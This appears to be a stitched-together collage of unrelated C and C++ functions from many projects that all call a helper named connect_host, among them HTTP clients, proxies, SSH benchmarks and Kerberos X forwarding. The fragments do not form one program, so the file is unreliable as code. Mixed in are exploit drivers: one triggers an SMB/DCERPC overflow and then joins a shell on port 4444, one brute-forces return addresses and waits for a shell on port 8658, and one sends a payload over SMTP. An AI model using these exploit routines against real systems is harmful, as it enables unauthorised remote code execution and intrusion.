int main(int argc, char **argv)
{
if(argc < 3)
exp_help();
else
process_args(argc, argv);
printf("[+] Connecting target %s\n", target_host);
connect_host(inet_addr(target_host), 139);
printf("[+] Setting up SMB Session\n");
session_setup();
printf("[+] Triggering up DCERPC reassembly\n");
build_trigger();
pwn();
printf("[+] Triggering overflow\n");
build_pwnage();
pwn();
disconnect_host();
sleep(1);
printf("[+] Attempting to join shell\n");
connect_host(inet_addr(target_host), 4444);
join_shell(sock);
return 0;
}
int Spider_Http_Client_Base::surface_page(std::string host,Http_Request_Package& request, Http_Response_Package& response)
{
int sock=connect_host(host);
if ( sock<=0 )
{
LLOG(L_ERROR, "surface_page connect_host error.");
return -1;
}
int ret=send_package(sock,request);
if ( ret!=0 )
{
LLOG(L_ERROR,"surface_page:send_package error. ");
return -1;
}
ret=recv_package(sock, response);
if (ret!=0)
{
LLOG(L_ERROR,"surface_page:recv_package error. ");
return -1;
}
int status_code=response.get_status_code();
close_socket(sock);
return status_code;
}
int main(int argc, const char *argv[])
{
const char* host = argv[1]; // 目标主机
char send_buff[SEND_BUF_SIZE]; // 发送缓冲区
char recv_buf[RECV_BUFF_SIZE]; // 接收缓冲区
size_t to_send_size = 0; // 要发送数据大小
int client_fd; // 客户端socket
struct addrinfo *addr; // 存放getaddrinfo返回数据
if (argc != 2) {
printf("Usage:%s [host]\n", argv[0]);
return 1;
}
addr = get_addr(host, "80");
client_fd = create_socket(addr);
connect_host(client_fd, addr);
freeaddrinfo(addr);
to_send_size = get_send_data(send_buff, SEND_BUF_SIZE, host);
send_data(client_fd, send_buff, to_send_size);
recv_data(client_fd, recv_buf, RECV_BUFF_SIZE);
close(client_fd);
return 0;
}
void* sendFile(void* args){
struct send_params *p;
p = (struct send_params *) args;
int sock = connect_host(p->host, p->port);
printf("\t[T]Started Sending %s \n", p->filename);
FILE *file = fopen(p->filename, "rb");
if (!file){
char msg[4];
*((int *)msg) = htonl(FILE_NOT_FOUND);
write(sock, msg, 4);
pthread_exit(NULL);
}
fseek(file, 0, SEEK_END);
unsigned long fileLen =ftell(file);
// Sending File Length
char msg[4];
*((int *)msg) = htonl(fileLen);
write(sock, msg, 4);
// Sending File Name
write(sock, p->filename, MAX_FILE_LENGTH);
rewind(file);
//Allocate memory
char *buffer=(char *)malloc(fileLen+1);
fread(buffer, fileLen, 1, file);
fclose(file);
write(sock, buffer, fileLen + 1);
close(sock);
printf("\t[T] Sent %d %s\n", (int)fileLen, p->filename);
free(buffer);
pthread_exit(NULL);
}
int exploit (char *host, int port, struct targets target) {
char *payload;
int thesock;
long ret;
if (opt_flags & OPT_BRUTE) {
for (ret = STACK_START; ret > STACK_END; ret-=steps) {
fprintf (stdout, "[+] Trying %#x\n", ret);
payload = xp_create (target.addr);
xp_send (host, port, payload);
sleep(timeout);
thesock = connect_host (host, 8658);
if (thesock == -1) {
fprintf (stdout, "[-] Exploit failed!\n");
xp_destroy (payload);
} else {
fprintf (stdout, "[+] Exploit success!\n");
fprintf (stdout, "[+] Waiting for shell\n");
shell (thesock);
break;
}
}
} else {
if (opt_flags & OPT_CHECK) {
fprintf (stdout, "[+] Checking for vulnability\n");
} else {
fprintf (stdout, "[+] Trying %#x\n", target.addr);
}
payload = xp_create (target.addr);
xp_send (host, port, payload);
sleep(2);
thesock = connect_host (host, 8658);
if (thesock == -1) {
fprintf (stdout, "[-] Exploit failed!\n");
xp_destroy (payload);
return EXIT_FAILURE;
} else {
fprintf (stdout, "[+] Exploit success!\n");
fprintf (stdout, "[+] Waiting for shell\n");
sleep(1);
shell (thesock);
}
}
return 0;
}
int main(int argc, char **argv){
struct argument_s arguments;
ssh_session session;
int i;
arguments_init(&arguments);
cmdline_parse(argc, argv, &arguments);
if (arguments.nhosts==0){
fprintf(stderr,"At least one host (-h) must be specified\n");
return EXIT_FAILURE;
}
if (arguments.ntests==0){
for(i=0; i < BENCHMARK_NUMBER ; ++i){
benchmarks[i].enabled=1;
}
arguments.ntests=BENCHMARK_NUMBER;
}
buffer=malloc(arguments.chunksize > 1024 ? arguments.chunksize : 1024);
if(buffer == NULL){
fprintf(stderr,"Allocation of chunk buffer failed\n");
return EXIT_FAILURE;
}
if (arguments.verbose > 0){
fprintf(stdout, "Will try hosts ");
for(i=0;i<arguments.nhosts;++i){
fprintf(stdout,"\"%s\" ", arguments.hosts[i]);
}
fprintf(stdout,"with benchmarks ");
for(i=0;i<BENCHMARK_NUMBER;++i){
if(benchmarks[i].enabled)
fprintf(stdout,"\"%s\" ",benchmarks[i].name);
}
fprintf(stdout,"\n");
}
for(i=0; i<arguments.nhosts;++i){
if(arguments.verbose > 0)
fprintf(stdout,"Connecting to \"%s\"...\n",arguments.hosts[i]);
session=connect_host(arguments.hosts[i], arguments.verbose, arguments.cipher);
if(session != NULL && arguments.verbose > 0)
fprintf(stdout,"Success\n");
if(session == NULL){
fprintf(stderr,"Errors occurred, stopping\n");
return EXIT_FAILURE;
}
do_benchmarks(session, &arguments, arguments.hosts[i]);
ssh_disconnect(session);
ssh_free(session);
}
return EXIT_SUCCESS;
}
int docycle(const char *host, int test){
SSH_SESSION *session=connect_host(host);
int ret=SSH_ERROR;
if(!session){
printf("connect failed\n");
} else {
printf("Connected\n");
ret=sftp_test(session,test);
if(ret != SSH_OK){
printf("Error in sftp\n");
}
ssh_disconnect(session);
}
return ret;
}
/* Create a new ssl conn structure and connect to a host */
ssl_conn* ssl_connect_host(char* host, int port)
{
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
printf("Can't allocate memory\n");
exit(1);
}
/* Initialize some values */
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
int main(int narg, char **opts)
{
int port = 8080, timeout = 30000, sock, rc = 0;
char *host = 0, *st;
char http_req[8192], http_response[8192];
memset(http_req, '\0', sizeof http_req);
strcat(http_req, "GET / HTTP/1.0\r\n\r\n");
if(narg < 2) { printf( "Err: No hostname\n"); exit(1); }
if(narg >= 3) port = atoi(opts[2]);
if(narg >= 4) timeout = atoi(opts[3]);
host = opts[1];
sock = connect_host(&rc, host, port, timeout, AF_INET);
printf( "After: sock=%d rc=%d\n", sock, rc);
errno = 0;
rc = write(sock, http_req, strlen(http_req));
printf( "dbg:: post-write rc=%d errno=%d '%s'\n", rc, errno, strerror(errno));
sleep(2);
for( rc = read(sock, http_response, sizeof http_response); rc > 0; rc = read(sock, http_response, sizeof http_response))
{
st = http_response;
printf( "Got:\n%s\n", st);
sleep(1);
}
sleep(1);
exit(0);
}
int connect_proxy(struct proxyinfo *pi)
{
char *h=strdup(pi->host);
char *p, *q;
int fd;
if (!h)
{
courier_authdebug_printf("%s", strerror(errno));
return -1;
}
for (p=h; *p;)
{
if (*p == ',')
{
++p;
continue;
}
for (q=p; *q; q++)
if (*q == ',')
break;
if (*q)
*q++=0;
fd=connect_host(pi, p);
if (fd >= 0)
{
free(h);
return fd;
}
p=q;
}
free(h);
return -1;
}
void submit_post(const char *host, const char *port, const char *method, const char *url, const char *postdata, uint32_t timeout)
{
int sockfd, n;
unsigned int i;
char *buf, *encoded=NULL;
size_t bufsz;
ssize_t recvsz;
char chunkedlen[21];
fd_set readfds;
struct timeval tv;
char *acceptable_methods[] = {
"GET",
"PUT",
"POST",
NULL
};
for (i=0; acceptable_methods[i] != NULL; i++)
if (!strcmp(method, acceptable_methods[i]))
break;
if (acceptable_methods[i] == NULL)
return;
bufsz = strlen(method);
bufsz += sizeof(" HTTP/1.1") + 2; /* Yes. Three blank spaces. +1 for the \n */
bufsz += strlen(url);
bufsz += sizeof("Host: \r\n");
bufsz += strlen(host);
bufsz += sizeof("Connection: Close\r\n");
bufsz += 4; /* +4 for \r\n\r\n */
if (!strcmp(method, "POST") || !strcmp(method, "PUT")) {
encoded = encode_data(postdata);
if (!(encoded))
return;
snprintf(chunkedlen, sizeof(chunkedlen), "%zu", strlen(encoded));
bufsz += sizeof("Content-Type: application/x-www-form-urlencoded\r\n");
bufsz += sizeof("Content-Length: \r\n");
bufsz += strlen(chunkedlen);
bufsz += strlen(encoded);
}
buf = cli_calloc(1, bufsz);
if (!(buf)) {
if ((encoded))
free(encoded);
return;
}
snprintf(buf, bufsz, "%s %s HTTP/1.1\r\n", method, url);
snprintf(buf+strlen(buf), bufsz-strlen(buf), "Host: %s\r\n", host);
snprintf(buf+strlen(buf), bufsz-strlen(buf), "Connection: Close\r\n");
if (!strcmp(method, "POST") || !strcmp(method, "PUT")) {
snprintf(buf+strlen(buf), bufsz-strlen(buf), "Content-Type: application/x-www-form-urlencoded\r\n");
snprintf(buf+strlen(buf), bufsz-strlen(buf), "Content-Length: %s\r\n", chunkedlen);
snprintf(buf+strlen(buf), bufsz-strlen(buf), "\r\n");
snprintf(buf+strlen(buf), bufsz-strlen(buf), "%s", encoded);
free(encoded);
}
#if defined(_WIN32)
sockfd = connect_host(host, port, timeout, 0);
#else
sockfd = connect_host(host, port, timeout, 1);
#endif
if (sockfd < 0) {
free(buf);
return;
}
cli_dbgmsg("stats - Connected to %s:%s\n", host, port);
if ((size_t)send(sockfd, buf, strlen(buf), 0) != (size_t)strlen(buf)) {
closesocket(sockfd);
free(buf);
return;
}
cli_dbgmsg("stats - Sending %s\n", buf);
while (1) {
FD_ZERO(&readfds);
FD_SET(sockfd, &readfds);
/*
* Check to make sure the stats submitted okay (so that we don't kill the HTTP request
* while it's being processed). Give a ten-second timeout so we don't have a major
* impact on scanning.
*/
tv.tv_sec = timeout;
tv.tv_usec = 0;
if ((n = select(sockfd+1, &readfds, NULL, NULL, &tv)) <= 0)
break;
if (FD_ISSET(sockfd, &readfds)) {
memset(buf, 0x00, bufsz);
if ((recvsz = recv(sockfd, buf, bufsz-1, 0) <= 0))
break;
buf[bufsz-1] = '\0';
cli_dbgmsg("stats - received: %s\n", buf);
if (strstr(buf, "STATOK")) {
cli_dbgmsg("stats - Data received okay\n");
break;
}
}
}
closesocket(sockfd);
free(buf);
}
/*
* ------------------------------------------------------------
*/
int main(int argc, char **argv)
{
/* In general, suffix "l" is low channel, "h" is high channel, "g"
* is gdb channel, "c" is control channel and "o" is output channel.
*/
struct sockaddr_in from;
int infd = 0, outfd;
unsigned short portl, porth, portg, portc, porto;
int on = 1, c;
char *outname, *outservice;
int fromlen;
int lish, lisg, lisc;
#if 0
FILE *newerr;
#endif /* 0 */
prog_name = argv[0];
if (isatty(infd))
usage();
/* Here, then not just a simple idiot. */
signal(SIGPIPE, SIG_IGN);
openlog(prog_name, LOG_PID, LOG_DAEMON);
fromlen = sizeof(from);
if (getsockname(infd, &from, &fromlen) < 0)
fault("getsockname: %s", strerror(errno));
if ((fromlen != sizeof(from)) || (from.sin_family != AF_INET))
fault("not an inet socket (family=%d)\n", from.sin_family);
portl = ntohs(from.sin_port);
porth = portl+1;
portg = porth+1;
portc = portg+1;
fromlen = sizeof(from);
if (getpeername(infd, &from, &fromlen) < 0)
fault("getpeername: %s", strerror(errno));
if ((fromlen != sizeof(from)) || (from.sin_family != AF_INET))
fault("not an inet socket (family=%d)\n", from.sin_family);
syslog(LOG_INFO, "on port %u peer is %s:%u\n", portl,
inet_ntoa(from.sin_addr), ntohs(from.sin_port));
if (setsockopt(infd, SOL_SOCKET, SO_KEEPALIVE, &on, sizeof (on)) < 0)
syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m");
/* from here on, we map stderr to output on the connection so we can
* report errors to the remote user.
*/
#if 0
if (!(newerr = fdopen(infd, "w")))
syslog(LOG_WARNING, "fdopen: %m");
else
*stderr = *newerr;
#endif
while((c = getopt(argc, argv, "d8h:g:c:")) != EOF)
{
switch(c)
{
case 'd':
debug++;
break;
case 'h':
/* high bit port */
if (getservice(optarg, &porth) < 0)
fault("getservice failed (high port '%s')\n", optarg);
break;
case 'g':
/* gdb port */
if (getservice(optarg, &portg) < 0)
fault("getservice failed (gdb port '%s')\n", optarg);
break;
case 'c':
/* control port */
if (getservice(optarg, &portc) < 0)
fault("getservice failed (control port '%s')\n", optarg);
break;
case '8':
/* 8-bit clean; no high port */
porth=0;
break;
default:
fault("bad argument list!\n");
}
}
if (argc != optind + 1)
fault("unparsed arguments (%d!=%d)\n", argc, optind+1);
outname = argv[optind];
if (!(outservice = strchr(outname, ':')))
fault("output arg '%s' doesn't contain ':'\n", outname);
*outservice++ = 0;
if (getservice(outservice, &porto) < 0)
fault("getservice failed (output port '%s')\n", outservice);
/* Time to start the sockets */
if (porth) {
lish = startlistening(porth);
} else {
lish = -1;
}
lisg = startlistening(portg);
lisc = startlistening(portc);
outfd = connect_host(outname, porto);
doit(infd, outfd, lish, lisg, lisc);
syslog(LOG_INFO, "terminating normally\n");
fclose(stderr);
closelog();
exit(0);
}
void GET(int newsockfd)
{
char s[INET6_ADDRSTRLEN];
char buffer[1024];
int flag=0,n,i;
char t1[512],t2[512],t3[16];
char* temp=NULL;
char* port;
bzero(buffer,1024);
recv(newsockfd,buffer,1024,0);
sscanf(buffer,"%s %s %s",t1,t2,t3);
if(((strncmp(t1,"GET",3)==0))&&((strncmp(t3,"HTTP/1.1",8)==0)||(strncmp(t3,"HTTP/1.0",8)==0))&&(strncmp(t2,"http://",7)==0))
{
strcpy(t1,t2);
flag=0;
for(i=7;i<strlen(t2);i++)
{
if(t2[i]==':')
{
flag=1;
break;
}
}
temp=strtok(t2,"//");
if(flag==0)
{
port="80";
temp=strtok(NULL,"/");
}
else
{
temp=strtok(NULL,":");
}
sprintf(t2,"%s",temp);
printf("host = %s",t2);
if(flag==1)
{
temp=strtok(NULL,"/");
port=temp;
}
strcat(t1,"^]");
temp=strtok(t1,"//");
temp=strtok(NULL,"/");
if(temp!=NULL)
temp=strtok(NULL,"^]");
printf("\npath = %s\nPort = %s\n",temp,port);
i=dir(t2,temp);
if(i==1)
{ printf("From Host\n");
connect_host(t2,port,temp,t3,newsockfd);
}
else
{ printf("From cache\n");
send_file(t2,port,temp,t3,newsockfd);
}
}
else
{
send(newsockfd,"400 : BAD REQUEST\nONLY HTTP REQUESTS ALLOWED",44,0);
}
}
static int
doit_active (kx_context *kc)
{
int otherside;
int nsockets;
struct x_socket *sockets;
u_char msg[1024], *p;
int len;
int tmp, tmp2;
char *str;
int i;
size_t rem;
uint32_t other_port;
int error;
const char *host = kc->host;
otherside = connect_host (kc);
if (otherside < 0)
return 1;
#if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT)
if (kc->keepalive_flag) {
int one = 1;
setsockopt (otherside, SOL_SOCKET, SO_KEEPALIVE, (void *)&one,
sizeof(one));
}
#endif
p = msg;
rem = sizeof(msg);
*p++ = INIT;
--rem;
len = strlen(kc->user);
tmp = kx_put_int (len, p, rem, 4);
if (tmp < 0)
return 1;
p += tmp;
rem -= tmp;
memcpy(p, kc->user, len);
p += len;
rem -= len;
*p++ = (kc->keepalive_flag ? KEEP_ALIVE : 0);
--rem;
str = getenv("DISPLAY");
if (str == NULL || (str = strchr(str, ':')) == NULL)
str = ":0";
len = strlen (str);
tmp = kx_put_int (len, p, rem, 4);
if (tmp < 0)
return 1;
rem -= tmp;
p += tmp;
memcpy (p, str, len);
p += len;
rem -= len;
str = getenv("XAUTHORITY");
if (str == NULL)
str = "";
len = strlen (str);
tmp = kx_put_int (len, p, rem, 4);
if (tmp < 0)
return 1;
p += len;
rem -= len;
memcpy (p, str, len);
p += len;
rem -= len;
if (kx_write (kc, otherside, msg, p - msg) != p - msg)
err (1, "write to %s", host);
len = kx_read (kc, otherside, msg, sizeof(msg));
if (len < 0)
err (1, "read from %s", host);
p = (u_char *)msg;
if (*p == ERROR) {
uint32_t u32;
p++;
p += kx_get_int (p, &u32, 4, 0);
errx (1, "%s: %.*s", host, (int)u32, p);
} else if (*p != ACK) {
errx (1, "%s: strange msg %d", host, *p);
}
tmp2 = get_xsockets (&nsockets, &sockets, kc->tcp_flag);
if (tmp2 < 0)
errx(1, "Failed to open sockets");
display_num = tmp2;
if (kc->tcp_flag)
snprintf (display, display_size, "localhost:%u", display_num);
else
snprintf (display, display_size, ":%u", display_num);
error = create_and_write_cookie (xauthfile, xauthfile_size,
cookie, cookie_len);
if (error)
errx(1, "failed creating cookie file: %s", strerror(error));
status_output (kc->debug_flag);
for (;;) {
fd_set fdset;
pid_t child;
int fd, thisfd = -1;
socklen_t zero = 0;
FD_ZERO(&fdset);
for (i = 0; i < nsockets; ++i) {
if (sockets[i].fd >= FD_SETSIZE)
errx (1, "fd too large");
FD_SET(sockets[i].fd, &fdset);
}
if (select(FD_SETSIZE, &fdset, NULL, NULL, NULL) <= 0)
continue;
for (i = 0; i < nsockets; ++i)
if (FD_ISSET(sockets[i].fd, &fdset)) {
thisfd = sockets[i].fd;
break;
}
fd = accept (thisfd, NULL, &zero);
if (fd < 0) {
if (errno == EINTR)
continue;
else
err(1, "accept");
}
p = msg;
*p++ = NEW_CONN;
if (kx_write (kc, otherside, msg, p - msg) != p - msg)
err (1, "write to %s", host);
len = kx_read (kc, otherside, msg, sizeof(msg));
if (len < 0)
err (1, "read from %s", host);
p = (u_char *)msg;
if (*p == ERROR) {
uint32_t val;
p++;
p += kx_get_int (p, &val, 4, 0);
errx (1, "%s: %.*s", host, (int)val, p);
} else if (*p != NEW_CONN) {
errx (1, "%s: strange msg %d", host, *p);
} else {
p++;
p += kx_get_int (p, &other_port, 4, 0);
}
++nchild;
child = fork ();
if (child < 0) {
warn("fork");
continue;
} else if (child == 0) {
int s;
for (i = 0; i < nsockets; ++i)
close (sockets[i].fd);
close (otherside);
socket_set_port(kc->thataddr, htons(tmp));
s = socket (kc->thataddr->sa_family, SOCK_STREAM, 0);
if (s < 0)
err(1, "socket");
#if defined(TCP_NODELAY) && defined(HAVE_SETSOCKOPT)
{
int one = 1;
setsockopt (s, IPPROTO_TCP, TCP_NODELAY, (void *)&one,
sizeof(one));
}
#endif
#if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT)
if (kc->keepalive_flag) {
int one = 1;
setsockopt (s, SOL_SOCKET, SO_KEEPALIVE, (void *)&one,
sizeof(one));
}
#endif
if (connect (s, kc->thataddr, kc->thataddr_len) < 0)
err(1, "connect");
return active_session (fd, s, kc);
} else {
close (fd);
}
}
}
static int
doit_passive (kx_context *kc)
{
int otherside;
u_char msg[1024], *p;
int len;
uint32_t tmp;
const char *host = kc->host;
otherside = connect_host (kc);
if (otherside < 0)
return 1;
#if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT)
if (kc->keepalive_flag) {
int one = 1;
setsockopt (otherside, SOL_SOCKET, SO_KEEPALIVE, (void *)&one,
sizeof(one));
}
#endif
p = msg;
*p++ = INIT;
len = strlen(kc->user);
p += kx_put_int (len, p, sizeof(msg) - 1, 4);
memcpy(p, kc->user, len);
p += len;
*p++ = PASSIVE | (kc->keepalive_flag ? KEEP_ALIVE : 0);
if (kx_write (kc, otherside, msg, p - msg) != p - msg)
err (1, "write to %s", host);
len = kx_read (kc, otherside, msg, sizeof(msg));
if (len <= 0)
errx (1,
"error reading initial message from %s: "
"this probably means it's using an old version.",
host);
p = (u_char *)msg;
if (*p == ERROR) {
p++;
p += kx_get_int (p, &tmp, 4, 0);
errx (1, "%s: %.*s", host, (int)tmp, p);
} else if (*p != ACK) {
errx (1, "%s: strange msg %d", host, *p);
} else
p++;
p += kx_get_int (p, &tmp, 4, 0);
memcpy(display, p, tmp);
display[tmp] = '\0';
p += tmp;
p += kx_get_int (p, &tmp, 4, 0);
memcpy(xauthfile, p, tmp);
xauthfile[tmp] = '\0';
p += tmp;
status_output (kc->debug_flag);
for (;;) {
pid_t child;
len = kx_read (kc, otherside, msg, sizeof(msg));
if (len < 0)
err (1, "read from %s", host);
else if (len == 0)
return 0;
p = (u_char *)msg;
if (*p == ERROR) {
p++;
p += kx_get_int (p, &tmp, 4, 0);
errx (1, "%s: %.*s", host, (int)tmp, p);
} else if(*p != NEW_CONN) {
errx (1, "%s: strange msg %d", host, *p);
} else {
p++;
p += kx_get_int (p, &tmp, 4, 0);
}
++nchild;
child = fork ();
if (child < 0) {
warn("fork");
continue;
} else if (child == 0) {
int fd;
int xserver;
close (otherside);
socket_set_port(kc->thataddr, htons(tmp));
fd = socket (kc->thataddr->sa_family, SOCK_STREAM, 0);
if (fd < 0)
err(1, "socket");
#if defined(TCP_NODELAY) && defined(HAVE_SETSOCKOPT)
{
int one = 1;
setsockopt (fd, IPPROTO_TCP, TCP_NODELAY, (void *)&one,
sizeof(one));
}
#endif
#if defined(SO_KEEPALIVE) && defined(HAVE_SETSOCKOPT)
if (kc->keepalive_flag) {
int one = 1;
setsockopt (fd, SOL_SOCKET, SO_KEEPALIVE, (void *)&one,
sizeof(one));
}
#endif
if (connect (fd, kc->thataddr, kc->thataddr_len) < 0)
err(1, "connect(%s)", host);
{
int d = 0;
char *s;
s = getenv ("DISPLAY");
if (s != NULL) {
s = strchr (s, ':');
if (s != NULL)
d = atoi (s + 1);
}
xserver = connect_local_xsocket (d);
if (xserver < 0)
return 1;
}
return passive_session (xserver, fd, kc);
} else {
}
}
}
static int prepare_http(int fd, char *buf) {
int host_fd, hdr_size, len_diff;
unsigned size, path_len, host_len, move_len;
char *h, *p, *host = NULL, *referer = NULL, *referer_end, *path;
if ((size = read_http_header(fd, buf)) == -1U)
return ERR_READ_REQ;
hdr_size = size >> 16;
size &= 0xffff;
if (invalid(buf, buf, hdr_size + 4))
return ERR_BAD_REQ;
// buf has enough space after size even when "\r\n\r\n" was not found,
// because MAX_HEADERS_SIZE - BUF_SIZE > 2
buf[hdr_size + 2] = 0; // "\r\n\r\n" -> "\r\n\0\n"
if (!(path = strpbrk(buf, " \r\n")))
return ERR_BAD_REQ;
path_len = strcspn(++path, " \r\n");
p = strstr(path + path_len, "\r\n");
while (p && (!host || !referer) && (p = strstr(h = p + 2, "\r\n")))
if (!strncasecmp(h, "host:", 5)) {
host = h + 5;
host += strspn(host, " \t");
host_len = p - host;
} else if (!strncasecmp(h, "referer:", 8)) {
referer = h + 8;
referer += strspn(referer, " \t");
referer += strcspn(referer, "/\r\n");
referer += strspn(referer, "/");
referer_end = p;
}
if (invalid(buf, host, host_len + 1))
return ERR_NO_HOST;
host[host_len] = 0;
if (referer && no_referer_match(host, referer)) {
if (path_len > 3 && !memcmp(path + path_len - 3, ".js", 3)) {
syslog(LOG_DEBUG | LOG_DAEMON, "refused: %s", host);
return ERR_REFUSED; // javascript cross-reference
}
if (memmem(path, path_len, ".gif?", 5)) {
syslog(LOG_DEBUG | LOG_DAEMON, "refused gif: %s", host);
return ERR_EMPTY_GIF;
}
} else {
referer = NULL; // matches, don't remove
}
host_fd = connect_host(host);
if (host_fd < 0)
return host_fd;
host[host_len] = '\r';
buf[hdr_size + 2] = '\r';
len_diff = BUF_SIZE;
if (referer)
len_diff = host_len + 1 - (referer_end - referer);
if (len_diff < BUF_SIZE - MAX_HEADERS_SIZE) {
p = host_len + 1 + referer;
move_len = buf + size - referer_end;
if (invalid(buf, p, move_len) ||
invalid(buf, referer_end, move_len) ||
invalid(buf, referer, host_len))
return ERR_BAD_REQ;
memmove(p, referer_end, move_len);
size += len_diff;
if (host > referer)
host += len_diff;
memcpy(referer, host, host_len);
referer[host_len] = '/';
}
if (full_write(host_fd, buf, size) <= 0) {
close(host_fd);
return ERR_WRITE;
}
return host_fd;
}
int xp_send (char *host, int port, char *payload) {
int thesock;
char buffer[BUFSIZ];
struct timeval tv;
fd_set rfds, wfds;
int ret;
thesock = connect_host (host, port);
if (thesock == -1) {
fprintf (stderr, "[-] Can't connect to target %s\n", host);
exit (EXIT_FAILURE);
} else {
fprintf (stdout, "[+] Connected.\n");
}
memset (buffer, 0x00, BUFSIZ);
#ifdef DEBUG
sleep(4);
#endif
// reading banner
//fprintf (stderr, "reading banner...\n");
memset (buffer, 0x00, BUFSIZ);
ret = recv (thesock, buffer, sizeof (buffer), 0);
//fprintf (stdout, "%s\n", buffer);
//sending helo
//fprintf (stderr, "sending HELO...\n");
memset (buffer, 0x00, BUFSIZ);
ret = send (thesock, HELO, strlen(HELO), 0);
ret = recv (thesock, buffer, sizeof (buffer), 0);
//fprintf (stdout, "%s\n", buffer);
// sending mail from:
//fprintf (stderr, "sending MAIL FROM:...\n");
memset (buffer, 0x00, BUFSIZ);
ret = send (thesock, FROM, strlen (FROM), 0);
ret = send (thesock, payload, strlen (payload), 0);
ret = recv (thesock, buffer, sizeof (buffer), 0);
//fprintf (stdout, "%s\n", buffer);
// sending rcpt to:
//fprintf (stderr, "sending RCPT TO:...\n");
memset (buffer, 0x00, BUFSIZ);
ret = send (thesock, RCPT, strlen (RCPT), 0);
ret = recv (thesock, buffer, sizeof (buffer), 0);
//fprintf (stdout, "%s\n", buffer);
FD_ZERO(&rfds);
FD_SET(thesock, &rfds);
tv.tv_sec = 7;
tv.tv_usec = 0;
// data
//fprintf (stderr, "sending DATA:...\n");
memset (buffer, 0x00, BUFSIZ);
ret = send (thesock, DATA, strlen (DATA), 0);
select (thesock+1, &rfds, NULL, NULL, &tv);
if (FD_ISSET(thesock, &rfds)) {
ret = recv (thesock, buffer, sizeof (buffer), 0);
//fprintf (stdout, "%s\n", buffer);
} else {
close (thesock);
return -1;
}
FD_ZERO(&rfds);
FD_SET(thesock, &rfds);
tv.tv_sec = 7;
tv.tv_usec = 0;
// end things
//fprintf (stderr, "sending END THINGS:...\n");
memset (buffer, 0x00, BUFSIZ);
ret = send (thesock, END, strlen (END), 0);
select (thesock+1, &rfds, NULL, NULL, &tv);
if (!FD_ISSET(thesock, &rfds)) {
fprintf (stdout, "[+] Offset seems good ! if the next hit fails\n");
fprintf (stdout, "[+] try to decrement THIS adddress by 5 or 10!\n");
close (thesock);
return -1;
}
ret = recv (thesock, buffer, sizeof (buffer), 0);
if (opt_flags & OPT_CHECK) {
if (buffer[0] == 0x00) {
fprintf (stdout, "[+] Host seams vulnable!\n");
} else {
fprintf (stdout, "[-] Host is not vulnable!\n");
}
close (thesock);
exit (EXIT_SUCCESS);
}
//fprintf (stdout, "%s\n", buffer);
ret = send (thesock, QUIT, strlen (QUIT), 0);
close (thesock);
return ret;
}
